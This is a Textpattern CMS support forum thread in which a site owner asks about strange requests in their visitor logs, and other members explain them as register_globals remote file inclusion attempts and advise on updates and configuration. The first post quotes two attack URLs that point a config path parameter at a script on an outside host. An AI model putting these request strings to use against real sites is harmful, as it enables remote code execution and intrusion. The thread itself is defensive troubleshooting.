Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Queer referrer in visitor logs
Hi
I found that request in visitor logs and want to know if someone knows what it s trying to achieve? is it a hacking attempt?
/textpattern/publish.php?txpcfg[txpath]=http://www.passaat.com/passaat/foto/test.txt???And this one also (same IP)
template/12//textpattern/publish.php?txpcfg[txpath]=http://www.passaat.com/passaat/foto/test.txt???Thanks
Last edited by Dragondz (2010-02-02 12:59:49)
Offline
Re: Queer referrer in visitor logs
Dragondz wrote:
I found that request in visitor logs and want to know if someone knows what it s trying to achieve? is it a hacking attempt?
It’s trying to register globals via URL. It only “works” if you allow PHP to register globals from URLs. And allowing register_globals is really bad idea – always.
Usign outdated server setup or bugs in used software (including plugins) might open this kind of holes. Also remember to update TXP. Version 4.0.6 is bare minimum (from security update perspective), and latest release is adviced. If your server is configured correctly that not-so-real-attack does absolutely nothing.
Offline
Re: Queer referrer in visitor logs
Thanks for clarifications, my txp install is 4.2.0 and register global are always set to 0.
Offline
Re: Queer referrer in visitor logs
I take it that #php_value register_globals 0 means they are set to 0 on my server too?
Offline
Re: Queer referrer in visitor logs
# at the beginning means that the line is a comment. So, atleast that line isn’t turning it off as it is commented out. Altho, PHP’s default release configuration is set to 0 (false/off), but who knows if it is set on by your host.
You can check the configuation with:
<txp:php>
echo 'Register_globals is: ' . ini_get('register_globals');
</txp:php>In TXP’s page tempate
Last edited by Gocom (2010-02-05 06:53:41)
Offline